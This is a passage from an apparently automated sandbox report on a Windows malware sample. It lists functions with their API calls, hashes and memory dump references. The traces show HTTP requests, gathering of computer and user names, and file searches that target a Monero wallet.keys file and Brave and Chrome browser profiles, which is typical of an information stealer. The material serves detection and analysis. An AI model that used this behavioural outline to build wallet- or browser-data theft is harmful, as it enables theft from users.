                          • ExitProcess.KERNEL32 ref: 00AF6B22
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                          • String ID:
                          • API String ID: 941982115-0
                          • Opcode ID: dbcb06cac736c46f7be1e244ba6c8372d5f33fcf71cc9f5c1142cf8ad5e154ce
                          • Instruction ID: 5e38d39a033d06cf85c0b24885121959d1aa81ee2e1d38ccfdccaf0dcb0e1f37
                          • Opcode Fuzzy Hash: dbcb06cac736c46f7be1e244ba6c8372d5f33fcf71cc9f5c1142cf8ad5e154ce
                          • Instruction Fuzzy Hash: A9F0D470A8031DABE720BBE09D0ABBE7B74EB24741F108514B716E6291DBB05541DAA6
                          Function 00AE47B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00AE4839
                          • InternetCrackUrlA.WININET(00000000,00000000), ref: 00AE4849
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CrackInternetlstrlen
                          • String ID: <
                          • API String ID: 1274457161-4251816714
                          • Opcode ID: c946df95796035665ee13a1eeed35802b446da10218b03d9de376622c40f7d58
                          • Instruction ID: e0d5079b0fc4cf6edae7de62eaeeefe905345577166ce026597e1f17a6d055eb
                          • Opcode Fuzzy Hash: c946df95796035665ee13a1eeed35802b446da10218b03d9de376622c40f7d58
                          • Instruction Fuzzy Hash: 7D211FB1D00209ABDF14DFA4E945ADD7B74FB55320F108629FA19A72D0DB706A05CF91
                          Function 00AF51F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00AFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00AFA7E6
                            • Part of subcall function 00AE6280: InternetOpenA.WININET(00B00DFE,00000001,00000000,00000000,00000000), ref: 00AE62E1
                            • Part of subcall function 00AE6280: StrCmpCA.SHLWAPI(?,0179E258), ref: 00AE6303
                            • Part of subcall function 00AE6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00AE6335
                            • Part of subcall function 00AE6280: HttpOpenRequestA.WININET(00000000,GET,?,0179DDB0,00000000,00000000,00400100,00000000), ref: 00AE6385
                            • Part of subcall function 00AE6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00AE63BF
                            • Part of subcall function 00AE6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00AE63D1
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00AF5228
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                          • String ID: ERROR$ERROR
                          • API String ID: 3287882509-2579291623
                          • Opcode ID: 8e74de5b99548c3253e3fecac0ab0d07093606859e3c4f2b2fd9cc0cb7978aa0
                          • Instruction ID: 3e0e03e65f39dfcfb59edc6f756cbaaa434883bd68d1e148b1f0a50c3cfe624b
                          • Opcode Fuzzy Hash: 8e74de5b99548c3253e3fecac0ab0d07093606859e3c4f2b2fd9cc0cb7978aa0
                          • Instruction Fuzzy Hash: 04110D7090014CA6CB14FFA4DE52AFD7778AF60340F408554FA0A4A192EF706B06C691
                          Function 00AE1110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00AE112B
                          • VirtualAllocExNuma.KERNEL32(00000000), ref: 00AE1132
                          • ExitProcess.KERNEL32 ref: 00AE1143
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$AllocCurrentExitNumaVirtual
                          • String ID:
                          • API String ID: 1103761159-0
                          • Opcode ID: cc49a04a81a1a1496db2cabcfec179597f52fbcff9ff92489458b1d9ea3a3318
                          • Instruction ID: 50b6df24dc8f336882b3f3d655905bbcdf63edd086c9cdaff17b0e50c397ee0e
                          • Opcode Fuzzy Hash: cc49a04a81a1a1496db2cabcfec179597f52fbcff9ff92489458b1d9ea3a3318
                          • Instruction Fuzzy Hash: 68E0E670A45348FBE7206BA59D0AB0D7678EB14B01F104154F709F62D0D6B5264196A9
                          Function 00AE10A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00AE10B3
                          • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00AE10F7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$AllocFree
                          • String ID:
                          • API String ID: 2087232378-0
                          • Opcode ID: 3631df32d3fe88c9bdbec9e40e9a81b9b712d640c2799eb902db710b68bb9513
                          • Instruction ID: 60e6732b4cd23b30cf776a6d56ce55a05b3887b04cb8e7cb31fcccda69a28352
                          • Opcode Fuzzy Hash: 3631df32d3fe88c9bdbec9e40e9a81b9b712d640c2799eb902db710b68bb9513
                          • Instruction Fuzzy Hash: 43F0E271641318BBEB149BA8AC49FBAB7E8E705B15F300448F604E3280D5719E00CAA4
                          Function 00AE1190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00AF78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00AF7910
                            • Part of subcall function 00AF78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00AF7917
                            • Part of subcall function 00AF78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00AF792F
                            • Part of subcall function 00AF7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00AE11B7), ref: 00AF7880
                            • Part of subcall function 00AF7850: RtlAllocateHeap.NTDLL(00000000), ref: 00AF7887
                            • Part of subcall function 00AF7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00AF789F
                          • ExitProcess.KERNEL32 ref: 00AE11C6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Process$AllocateName$ComputerExitUser
                          • String ID:
                          • API String ID: 3550813701-0
                          • Opcode ID: d53970d05b86826dfe00933f10bc6e38328b4cd2dab12a5d15c9c8bf5e41b364
                          • Instruction ID: 002c6c99473bc2cf0384dd922cb6d5518507fa885e11319fb10d2af34e8612f0
                          • Opcode Fuzzy Hash: d53970d05b86826dfe00933f10bc6e38328b4cd2dab12a5d15c9c8bf5e41b364
                          • Instruction Fuzzy Hash: C6E012B591430953CE1477F5AD0AB3A339CDB24386F480528FB05D3302FA29E85285BA

                          Non-executed Functions

                          Function 00AF38B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 00AF38CC
                          • FindFirstFileA.KERNEL32(?,?), ref: 00AF38E3
                          • lstrcat.KERNEL32(?,?), ref: 00AF3935
                          • StrCmpCA.SHLWAPI(?,00B00F70), ref: 00AF3947
                          • StrCmpCA.SHLWAPI(?,00B00F74), ref: 00AF395D
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00AF3C67
                          • FindClose.KERNEL32(000000FF), ref: 00AF3C7C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                          • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                          • API String ID: 1125553467-2524465048
                          • Opcode ID: 73e071ad08675608ba78e94f8e49f7a0f0cc847876f4eb484ee312e399f3bc4f
                          • Instruction ID: 1fc83249392c36ab6c35eddbb3d5109a77fb606d5c542955d502b8a4ab35477e
                          • Opcode Fuzzy Hash: 73e071ad08675608ba78e94f8e49f7a0f0cc847876f4eb484ee312e399f3bc4f
                          • Instruction Fuzzy Hash: B0A12CB2A003189BDB34EBA4DC85FFA7378FB58301F044588B60D96181EB759B85CF62
                          Function 00AEBE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                            • Part of subcall function 00AFA920: lstrcpy.KERNEL32(00000000,?), ref: 00AFA972
                            • Part of subcall function 00AFA920: lstrcat.KERNEL32(00000000), ref: 00AFA982
                            • Part of subcall function 00AFA9B0: lstrlen.KERNEL32(?,017988E8,?,\Monero\wallet.keys,00B00E17), ref: 00AFA9C5
                            • Part of subcall function 00AFA9B0: lstrcpy.KERNEL32(00000000), ref: 00AFAA04
                            • Part of subcall function 00AFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00AFAA12
                            • Part of subcall function 00AFA8A0: lstrcpy.KERNEL32(?,00B00E17), ref: 00AFA905
                          • FindFirstFileA.KERNEL32(00000000,?,00B00B32,00B00B2B,00000000,?,?,?,00B013F4,00B00B2A), ref: 00AEBEF5
                          • StrCmpCA.SHLWAPI(?,00B013F8), ref: 00AEBF4D
                          • StrCmpCA.SHLWAPI(?,00B013FC), ref: 00AEBF63
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00AEC7BF
                          • FindClose.KERNEL32(000000FF), ref: 00AEC7D1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                          • API String ID: 3334442632-726946144
                          • Opcode ID: 75217b58bf893c73c5cde892b9389f073fb9a35359ecf60c8a7475c8f53a072d
                          • Instruction ID: 084073a77603329f9fc82d561a7859a9b7853c9f911dc5d62bdd7b87549d8880
                          • Opcode Fuzzy Hash: 75217b58bf893c73c5cde892b9389f073fb9a35359ecf60c8a7475c8f53a072d
                          • Instruction Fuzzy Hash: 284258B291010897CB14FBB4DE96EFD737DAF64300F408558B60E96191EF74AB49CBA2
                          Function 00AF4910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 00AF492C
                          • FindFirstFileA.KERNEL32(?,?), ref: 00AF4943
                          • StrCmpCA.SHLWAPI(?,00B00FDC), ref: 00AF4971
                          • StrCmpCA.SHLWAPI(?,00B00FE0), ref: 00AF4987
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00AF4B7D
                          • FindClose.KERNEL32(000000FF), ref: 00AF4B92
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\%s$%s\%s$%s\*
                          • API String ID: 180737720-445461498
                          • Opcode ID: ca4d6c03379eff5422523744f3d97c20c269634355ff332a10f63861fc211183
                          • Instruction ID: c24d1a2a2ef5be7f99810eea28d05ce12ba92fa63cea4d20c8e4a06f56420b24
                          • Opcode Fuzzy Hash: ca4d6c03379eff5422523744f3d97c20c269634355ff332a10f63861fc211183
                          • Instruction Fuzzy Hash: 6C6153B1910219ABCB30EBA4DC85FFA77BCFB58701F004588B609D6141EB71AB45CFA1
                          Function 00AF4570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00AF4580
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00AF4587
                          • wsprintfA.USER32 ref: 00AF45A6
                          • FindFirstFileA.KERNEL32(?,?), ref: 00AF45BD
                          • StrCmpCA.SHLWAPI(?,00B00FC4), ref: 00AF45EB
                          • StrCmpCA.SHLWAPI(?,00B00FC8), ref: 00AF4601
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00AF468B
                          • FindClose.KERNEL32(000000FF), ref: 00AF46A0
                          • lstrcat.KERNEL32(?,0179E328), ref: 00AF46C5
                          • lstrcat.KERNEL32(?,0179D700), ref: 00AF46D8
                          • lstrlen.KERNEL32(?), ref: 00AF46E5
                          • lstrlen.KERNEL32(?), ref: 00AF46F6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
